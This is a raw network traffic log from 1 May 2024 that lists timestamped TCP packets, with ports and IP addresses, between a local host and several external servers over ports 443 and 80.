May 1, 2024 15:17:09.858192921 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.858241081 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.859299898 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.859308004 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.859359026 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.859359026 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.859380007 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.859405994 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.859421968 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.861027002 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.861047983 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.861078024 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.861087084 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.861109018 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.861120939 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.870697021 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.870712996 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.870788097 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.870799065 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.870831966 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.872065067 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.872081041 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.872131109 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.872140884 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.872189999 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.874783993 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.874804974 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.874857903 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.874866962 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.874924898 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.885974884 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.898257971 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.898277044 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.898312092 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.898322105 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.898350954 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.898422003 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.914460897 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.914478064 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.914521933 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.914530993 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.914750099 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.917308092 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.917324066 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.917388916 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.917396069 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.917424917 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.917443991 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.917648077 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.917660952 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.917709112 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.917715073 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.917745113 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.917762995 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.919437885 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.919456959 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.919502974 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.919509888 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.919533968 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.919557095 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.921372890 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.921390057 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.921452999 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.921459913 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.921509981 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.923465014 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.923482895 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.923544884 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.923552036 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.923592091 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.925398111 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.925411940 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.925477028 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.925493956 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.925519943 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.925537109 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.928423882 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.928437948 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.928483009 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.928493977 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.928500891 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.928544998 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.929524899 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.929542065 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.929600954 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.929610014 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.930907965 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.930927038 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.930967093 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.930974960 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.931010008 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.932723045 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.932737112 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.932799101 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.932806969 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.932862043 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.934647083 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.934663057 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.934724092 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.934731007 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.934765100 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.936644077 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.936661959 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.936712980 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.936721087 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.936749935 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.937659025 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.937673092 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.937714100 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.937724113 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.937752008 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.953429937 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.953448057 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.953485966 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.953504086 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.953530073 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.955164909 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.955183983 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.955219984 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.955229044 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.955243111 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.957171917 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.957189083 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.957263947 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.957263947 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.957272053 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.958997965 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.959012032 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.959055901 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.959065914 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.959109068 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.960104942 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.960119963 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.960195065 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.960201979 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.960226059 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.961978912 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.961997032 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.962048054 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.962058067 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.962086916 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.963928938 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.963943005 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.964037895 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.964037895 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.964051008 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.966484070 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.966506004 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.966582060 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.966582060 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.966589928 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.967591047 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.967603922 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.967637062 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.967648983 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.967658997 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.969770908 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.969791889 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.969825983 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.969835043 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.969857931 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.971338987 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.971352100 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.971386909 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.971395016 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.971419096 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.974490881 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.974509001 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.974587917 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.974587917 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.974597931 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.993400097 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.993415117 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.993463993 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.993474007 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.993505955 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.009345055 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.009368896 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.009417057 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.009428024 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.009459019 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.010335922 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.010356903 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.010395050 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.010402918 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.010426998 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.012739897 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.012758970 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.012794971 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.012804031 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.012844086 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.014663935 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.014679909 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.014724970 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.014730930 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.014764071 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.016024113 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.016041994 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.016083002 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.016089916 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.016124010 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.017981052 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.017995119 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.018032074 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.018040895 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.018070936 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.019901991 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.019927025 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.019963026 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.019969940 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.020004034 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.021142006 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.021155119 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.021203041 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.021210909 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.021254063 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.023030043 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.023050070 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.023087978 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.023097038 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.023128986 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.024854898 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.024873972 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.024905920 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.024914026 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.024944067 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.026850939 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.026861906 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.026907921 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.026916027 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.026962042 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.028839111 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.028853893 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.028888941 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.028896093 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.028939009 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.029764891 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.029784918 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.029814005 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.029819965 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.029841900 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.031913996 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.031941891 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.031996012 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.032007933 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.032027006 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.033757925 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.033776999 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.033813000 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.033823013 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.033855915 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.035605907 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.035625935 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.035660028 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.035665989 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.035690069 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.036612988 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.036633968 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.036672115 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.036679983 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.036721945 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.037368059 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.037421942 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.037427902 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.037465096 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:10.037484884 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:10.037508011 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:14.779648066 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:15.528697968 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:21.979984999 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:21.980007887 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:21.980077028 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:21.980443001 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:21.980452061 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:22.272882938 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:22.283107996 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:22.283121109 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:22.284373999 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:22.284429073 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:22.287540913 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:22.287653923 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:22.287750959 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:22.287759066 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:22.386215925 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:22.389763117 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:22.389914036 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:22.389970064 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:22.390919924 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:22.390933037 CEST	443	49725	23.210.0.138	192.168.2.6
May 1, 2024 15:17:22.390942097 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:22.390976906 CEST	49725	443	192.168.2.6	23.210.0.138
May 1, 2024 15:17:22.400115013 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:25.722404957 CEST	49730	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:25.874146938 CEST	80	49730	158.101.44.242	192.168.2.6
May 1, 2024 15:17:25.874586105 CEST	49730	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:25.874871016 CEST	49730	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:26.026494980 CEST	80	49730	158.101.44.242	192.168.2.6
May 1, 2024 15:17:26.405328035 CEST	80	49730	158.101.44.242	192.168.2.6
May 1, 2024 15:17:26.420913935 CEST	49730	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:26.572604895 CEST	80	49730	158.101.44.242	192.168.2.6
May 1, 2024 15:17:26.598414898 CEST	80	49730	158.101.44.242	192.168.2.6
May 1, 2024 15:17:26.737296104 CEST	49731	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:26.737337112 CEST	443	49731	104.21.67.152	192.168.2.6
May 1, 2024 15:17:26.737560034 CEST	49731	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:26.745835066 CEST	49731	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:26.745862961 CEST	443	49731	104.21.67.152	192.168.2.6
May 1, 2024 15:17:26.771261930 CEST	49730	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:26.947946072 CEST	443	49731	104.21.67.152	192.168.2.6
May 1, 2024 15:17:26.948029995 CEST	49731	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:26.955476046 CEST	49731	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:26.955493927 CEST	443	49731	104.21.67.152	192.168.2.6
May 1, 2024 15:17:26.955749989 CEST	443	49731	104.21.67.152	192.168.2.6
May 1, 2024 15:17:27.065224886 CEST	49731	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:27.146833897 CEST	49731	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:27.192131996 CEST	443	49731	104.21.67.152	192.168.2.6
May 1, 2024 15:17:27.606878042 CEST	443	49731	104.21.67.152	192.168.2.6
May 1, 2024 15:17:27.606956959 CEST	443	49731	104.21.67.152	192.168.2.6
May 1, 2024 15:17:27.607076883 CEST	49731	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:28.409790039 CEST	49731	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:28.575845003 CEST	49730	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:28.728415966 CEST	80	49730	158.101.44.242	192.168.2.6
May 1, 2024 15:17:28.744405031 CEST	49732	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:28.744437933 CEST	443	49732	104.21.67.152	192.168.2.6
May 1, 2024 15:17:28.744496107 CEST	49732	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:28.744925976 CEST	49732	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:28.744940042 CEST	443	49732	104.21.67.152	192.168.2.6
May 1, 2024 15:17:28.864284992 CEST	49730	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:28.944376945 CEST	443	49732	104.21.67.152	192.168.2.6
May 1, 2024 15:17:28.968225956 CEST	49732	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:28.968245029 CEST	443	49732	104.21.67.152	192.168.2.6
May 1, 2024 15:17:29.195622921 CEST	443	49732	104.21.67.152	192.168.2.6
May 1, 2024 15:17:29.195734024 CEST	443	49732	104.21.67.152	192.168.2.6
May 1, 2024 15:17:29.195849895 CEST	49732	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:29.199750900 CEST	49732	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:29.268814087 CEST	49730	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:29.270117998 CEST	49733	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:29.420528889 CEST	80	49730	158.101.44.242	192.168.2.6
May 1, 2024 15:17:29.420609951 CEST	49730	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:29.424849033 CEST	80	49733	158.101.44.242	192.168.2.6
May 1, 2024 15:17:29.424925089 CEST	49733	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:29.425093889 CEST	49733	80	192.168.2.6	158.101.44.242
May 1, 2024 15:17:29.579839945 CEST	80	49733	158.101.44.242	192.168.2.6
May 1, 2024 15:17:29.616218090 CEST	80	49733	158.101.44.242	192.168.2.6
May 1, 2024 15:17:29.617605925 CEST	49734	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:29.617630959 CEST	443	49734	104.21.67.152	192.168.2.6
May 1, 2024 15:17:29.617693901 CEST	49734	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:29.617970943 CEST	49734	443	192.168.2.6	104.21.67.152
May 1, 2024 15:17:29.617981911 CEST	443	49734	104.21.67.152	192.168.2.6
